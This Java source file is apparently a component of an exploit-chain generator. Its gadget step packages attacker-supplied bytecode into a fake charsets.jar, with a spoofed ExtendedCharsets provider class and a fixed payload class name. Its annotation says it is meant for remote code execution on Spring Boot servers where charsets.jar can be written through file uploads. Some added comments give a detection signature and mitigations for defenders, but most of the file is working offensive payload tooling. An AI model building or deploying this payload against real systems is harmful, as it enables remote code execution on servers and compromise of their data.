package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.JavassistHelper;
import java.io.ByteArrayOutputStream;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;
import sun.nio.cs.ext.MyExtendedCharsets;

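/**
 * Gadget step that wraps the bytecode produced by the rest of the chain into an in-memory JAR
 * laid out like a JDK {@code charsets.jar}.
 *
 * <p>The annotation's description (kept in its original language because it is a runtime string)
 * says: the bytecode is packaged as a {@code charsets.jar} file, the technique targets Spring Boot
 * environments where {@code charsets.jar} can be written, and the payload class name is hard-coded
 * to {@code sun.nio.cs.ext.IBM33722}. The two references in the description are the technique's
 * original write-ups.
 *
 * <p>The generated archive always holds exactly two entries:
 * <ol>
 *   <li>{@code sun/nio/cs/ext/ExtendedCharsets.class}, derived from the bundled
 *       {@code MyExtendedCharsets} template, which is renamed through {@code JavassistHelper};</li>
 *   <li>one entry named after the supplied class name, holding the caller's bytecode.</li>
 * </ol>
 *
 * <p>Reviewer note (defensive): an archive containing its own
 * {@code sun/nio/cs/ext/ExtendedCharsets.class} next to a single extra class is a usable
 * content signature for this output. Any write to a runtime's {@code charsets.jar} by an
 * application process is worth alerting on. Running the service on a read-only runtime image and
 * constraining upload destinations removes the file-write precondition that the description
 * relies on.
 */
@GadgetAnnotation(name = "charsets利用姿势1-jar包", description = "将字节码封装为charsets.jar文件\n适用于 SpringBoot 环境下写 charsets.jar RCE\n这里会固定写死恶意className为: sun.nio.cs.ext.IBM33722\nReference: \nhttps://landgrey.me/blog/22/\nhttps://github.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks\n", dependencies = {"springboot"}, authors = {Authors.LandGrey}, priority = 30)
@GadgetTags(tags = {Tag.CharsetJAR, Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/CharsetJarConvert.class */
public class CharsetJarConvert implements Gadget {
    /** Class name given to the provider class that is placed first in the archive. */
    private static final String PROVIDER_CLASS_NAME = "sun.nio.cs.ext.ExtendedCharsets";

    /** Class name forced onto the downstream bytecode generator by {@link #invoke}. */
    private static final String FIXED_PAYLOAD_CLASS_NAME = "sun.nio.cs.ext.IBM33722";

    /**
     * Lazily built bytecode of the renamed provider class, reused across calls.
     *
     * <p>NOTE(review): the field is public, mutable and filled without synchronization. Concurrent
     * first calls may each regenerate it, and any other code can overwrite it. It is left as is
     * because its visibility is part of the class's existing surface.
     */
    public static byte[] cacheBytecode = null;

    /**
     * Instance-level convenience wrapper around {@link #createCharsetJar(byte[], String)}.
     *
     * @param bArr bytecode to store as the second archive entry
     * @param str dotted class name used to derive that entry's path
     * @return the bytes of the finished JAR
     * @throws Exception if building the archive fails
     */
    public byte[] getObject(byte[] bArr, String str) throws Exception {
        return createCharsetJar(bArr, str);
    }

    /**
     * Pins the chain's {@code className} parameter, asks the chain for the bytecode and wraps the
     * result into the JAR.
     *
     * @param gadgetContext context whose engine receives the fixed class name and which is then
     *     queried for {@code ContextTag.CLASS_NAME_KEY}
     * @param gadgetChain chain that produces the bytecode; its result is cast to {@code byte[]}
     * @return the JAR bytes as a {@code byte[]}
     * @throws Exception if the chain or the archive construction fails
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        // Order matters: the parameter is set before the chain runs and before the name is read back.
        gadgetContext.getEngine().setGadgetParam("className", FIXED_PAYLOAD_CLASS_NAME);
        byte[] chainBytecode = (byte[]) gadgetChain.doCreate(gadgetContext);
        String className = gadgetContext.getString(ContextTag.CLASS_NAME_KEY);
        return getObject(chainBytecode, className);
    }

    /**
     * Builds the two-entry JAR in memory.
     *
     * <p>The decompiled form of this method had lost its try-with-resources: it carried dead
     * {@code if (0 != 0)} branches that dereferenced a {@code null} throwable, and a failing
     * {@code close()} on the error path replaced the original exception. The construct is restored
     * here, so a failure while closing is attached as a suppressed exception instead.
     *
     * @param bArr bytecode written as the second entry
     * @param str dotted class name; dots are replaced by {@code /} and {@code .class} is appended
     *     to form the entry path (the value is not validated here)
     * @return the complete archive, read only after the JAR stream has been closed
     * @throws Exception if generating the provider class or writing the archive fails
     */
    public static byte[] createCharsetJar(byte[] bArr, String str) throws Exception {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (JarOutputStream jar = new JarOutputStream(buffer)) {
            if (cacheBytecode == null) {
                JavassistHelper helper = new JavassistHelper(MyExtendedCharsets.class);
                // presumably the class-file major version (50 = Java 6); confirm in JavassistHelper
                helper.setVersion(50);
                helper.setClassName(PROVIDER_CLASS_NAME);
                cacheBytecode = helper.getBytecode();
            }
            writeEntry(jar, PROVIDER_CLASS_NAME, cacheBytecode);
            writeEntry(jar, str, bArr);
        }
        // The stream must be closed before the buffer is read so the archive is complete.
        return buffer.toByteArray();
    }

    /** Writes one class entry whose path is derived from the dotted class name. */
    private static void writeEntry(JarOutputStream jar, String className, byte[] bytecode) throws Exception {
        jar.putNextEntry(new JarEntry(className.replace(".", "/") + ".class"));
        jar.write(bytecode);
        jar.closeEntry();
    }
}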
